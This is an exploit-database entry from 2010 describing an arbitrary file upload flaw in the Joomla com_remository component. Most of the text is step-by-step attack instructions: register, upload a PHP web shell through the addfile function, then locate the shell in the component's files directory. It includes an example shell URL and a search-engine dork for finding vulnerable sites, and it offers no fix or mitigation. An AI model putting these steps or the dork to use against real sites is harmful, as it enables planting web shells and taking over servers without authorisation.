Joomla! Component com_remository - Arbitrary File Upload

EDB-ID:

14811

CVE:



Author:

J3yk0ob

Type:

webapps


Platform:

PHP

Date:

2010-08-26


#################################################################
#                           I N F O
#
# Exploit Title: Joomla com_remository Remote Upload File
# Date: 2010-08-26 
# Author: J3yk0ob
# Home  : http://www.J3yk0ob.com
#
#################################################################
#                        E X P L O I T
#
#  1. Register On Site
#
#  2. http://www.Target.com/index.php?option=com_remository&Itemid=[Itemid]&func=addfile
#
#  3. Add your php file , example : shell.php
#
#  4. http://www.Target.com/components/com_remository_files/
#
#  5. If web server alowe to see directory you can see folder example : file_image_2
#
#  6. You can find your shell in lates file_image_[latest Number]
#
#  7 . Example URL : http://www.example.com/components/com_remository_files/file_image_14/1276100016shell.php
#
#  Dork : inurl:"index.php?com_remository"
#
#################################################################
# Contact Me
#
# Home : http://www.J3yk0ob.com
# Email : 4dm1n@J3yk0ob.com
#
##################################################################